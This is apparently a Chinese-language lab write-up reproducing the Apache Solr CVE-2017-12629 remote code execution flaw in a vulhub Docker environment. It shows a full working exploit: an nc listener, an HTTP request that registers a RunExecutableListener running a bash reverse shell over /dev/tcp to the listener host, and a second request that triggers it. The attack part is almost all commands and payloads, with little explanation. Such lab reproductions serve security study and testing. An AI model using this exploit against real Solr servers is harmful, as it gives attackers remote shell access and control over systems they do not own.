前言
影響版本
Apache Solr < 7.1
Apache Lucene < 7.1
環境搭建
啓動docker
systemctl start docker
獲取vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
進入對應目錄
cd vulhub/solr/CVE-2017-12629-RCE/
啓動容器
docker-compose up -d
查看容器
docker ps
漏洞復現
在centos上啓動監聽
nc -lvvp 80
創建一個listener
POST /solr/demo/config HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 185
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.164.162/80 0>&1"]}}
觸發剛纔添加的listener
POST /solr/demo/update HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15
[{"id":"test"}]
參考文章
https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/